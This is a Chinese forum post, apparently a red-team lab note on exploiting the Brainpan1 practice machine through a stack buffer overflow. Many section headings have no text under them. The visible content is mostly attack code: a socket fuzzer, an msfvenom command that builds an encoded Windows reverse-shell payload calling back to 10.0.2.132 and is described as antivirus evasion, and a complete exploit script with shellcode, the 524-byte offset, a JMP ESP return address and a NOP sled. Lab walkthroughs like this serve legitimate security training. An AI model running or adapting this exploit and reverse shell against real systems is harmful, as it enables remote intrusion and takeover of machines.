ToB企服应用市场:ToB评测及商务社交产业平台

标题: 第十一篇红队笔记-百靶精讲之Brainpan1-缓存区溢出 [打印本页]

作者: 何小豆儿在此    时间: 2024-6-11 11:39
标题: 第十一篇红队笔记-百靶精讲之Brainpan1-缓存区溢出
nmap扫描



web渗透测试



缓冲区溢出漏洞辨认


  1. #! /usr/bin/python
  2. import socket
  3. import time
  4. import sys
  5. size = 100
  6. server = str(sys.argv[1])
  7. port = int(sys.argv[2])
  8. while True:
  9.     try:
  10.         print("\n[+] buffer is %s byets" % size);
  11.         buffer = "A" * size
  12.         s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  13.         s.connect((server,port))
  14.         print(buffer+"1")
  15.         s.send(buffer.encode())
  16.         s.close()
  17.         size += 100
  18.         time.sleep(3)
  19.     except:
  20.         print ("\n[+] Cloud not connect.")
  21.         sys.exit()
复制代码


定位eip寄存器


esp扩容


坏字节辨认


jmp esp定位


payload编写

  1. # x86/shikata_ga_nai 防免杀
  2. msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=10.0.2.132 -e x86/shikata_ga_nai -b "\x00" -f python
复制代码

  1. #coding:utf-8
  2. import socket
  3. import time
  4. import sys
  5. size = 100
  6. server = str(sys.argv[1])
  7. port = int(sys.argv[2])
  8. while True:
  9.     try:
  10.         print("\n[+] buffer is %s byets" % size);
  11.         buf =  b""
  12.         buf += b"\xbb\x37\x60\x4f\x5f\xda\xc6\xd9\x74\x24\xf4\x5d"
  13.         buf += b"\x33\xc9\xb1\x52\x83\xed\xfc\x31\x5d\x0e\x03\x6a"
  14.         buf += b"\x6e\xad\xaa\x68\x86\xb3\x55\x90\x57\xd4\xdc\x75"
  15.         buf += b"\x66\xd4\xbb\xfe\xd9\xe4\xc8\x52\xd6\x8f\x9d\x46"
  16.         buf += b"\x6d\xfd\x09\x69\xc6\x48\x6c\x44\xd7\xe1\x4c\xc7"
  17.         buf += b"\x5b\xf8\x80\x27\x65\x33\xd5\x26\xa2\x2e\x14\x7a"
  18.         buf += b"\x7b\x24\x8b\x6a\x08\x70\x10\x01\x42\x94\x10\xf6"
  19.         buf += b"\x13\x97\x31\xa9\x28\xce\x91\x48\xfc\x7a\x98\x52"
  20.         buf += b"\xe1\x47\x52\xe9\xd1\x3c\x65\x3b\x28\xbc\xca\x02"
  21.         buf += b"\x84\x4f\x12\x43\x23\xb0\x61\xbd\x57\x4d\x72\x7a"
  22.         buf += b"\x25\x89\xf7\x98\x8d\x5a\xaf\x44\x2f\x8e\x36\x0f"
  23.         buf += b"\x23\x7b\x3c\x57\x20\x7a\x91\xec\x5c\xf7\x14\x22"
  24.         buf += b"\xd5\x43\x33\xe6\xbd\x10\x5a\xbf\x1b\xf6\x63\xdf"
  25.         buf += b"\xc3\xa7\xc1\x94\xee\xbc\x7b\xf7\x66\x70\xb6\x07"
  26.         buf += b"\x77\x1e\xc1\x74\x45\x81\x79\x12\xe5\x4a\xa4\xe5"
  27.         buf += b"\x0a\x61\x10\x79\xf5\x8a\x61\x50\x32\xde\x31\xca"
  28.         buf += b"\x93\x5f\xda\x0a\x1b\x8a\x4d\x5a\xb3\x65\x2e\x0a"
  29.         buf += b"\x73\xd6\xc6\x40\x7c\x09\xf6\x6b\x56\x22\x9d\x96"
  30.         buf += b"\x31\x47\x62\x9a\x45\x3f\x60\x9a\x44\x7b\xed\x7c"
  31.         buf += b"\x2c\x6b\xb8\xd7\xd9\x12\xe1\xa3\x78\xda\x3f\xce"
  32.         buf += b"\xbb\x50\xcc\x2f\x75\x91\xb9\x23\xe2\x51\xf4\x19"
  33.         buf += b"\xa5\x6e\x22\x35\x29\xfc\xa9\xc5\x24\x1d\x66\x92"
  34.         buf += b"\x61\xd3\x7f\x76\x9c\x4a\xd6\x64\x5d\x0a\x11\x2c"
  35.         buf += b"\xba\xef\x9c\xad\x4f\x4b\xbb\xbd\x89\x54\x87\xe9"
  36.         buf += b"\x45\x03\x51\x47\x20\xfd\x13\x31\xfa\x52\xfa\xd5"
  37.         buf += b"\x7b\x99\x3d\xa3\x83\xf4\xcb\x4b\x35\xa1\x8d\x74"
  38.         buf += b"\xfa\x25\x1a\x0d\xe6\xd5\xe5\xc4\xa2\xe6\xaf\x44"
  39.         buf += b"\x82\x6e\x76\x1d\x96\xf2\x89\xc8\xd5\x0a\x0a\xf8"
  40.         buf += b"\xa5\xe8\x12\x89\xa0\xb5\x94\x62\xd9\xa6\x70\x84"
  41.         buf += b"\x4e\xc6\x50"
  42.         buffer = "\x41" * 524 + "\xf3\x12\x17\x31" + "\x90" * 16 + buf
  43.         s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  44.         s.connect((server,port))
  45.         s.recv(1024)
  46.         s.send(buffer)
  47.         print "done"
  48.         size += 100
  49.         time.sleep(3)
  50.     except Exception as errorMsg:
  51.             print "产生错误了:%s'%errorMsg"
  52.             print "\n[+] Cloud not connect."
  53.             sys.exit()
复制代码

乐成使用缓冲区漏洞


巧用anansi_util提权


其他

缓冲区溢出漏洞流程


EIP、EBP、ESP的解读


为什么EIP是41414141可以判断缓冲区存在溢出


确认偏移量524是否精确的溢出点


怎么通过35724134地址得到524就是偏移量



为什么要测试坏字符


发生pycommands:error importing module.


怎么判定可用dll模块


为什么跑的是window-exe确实linux



免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4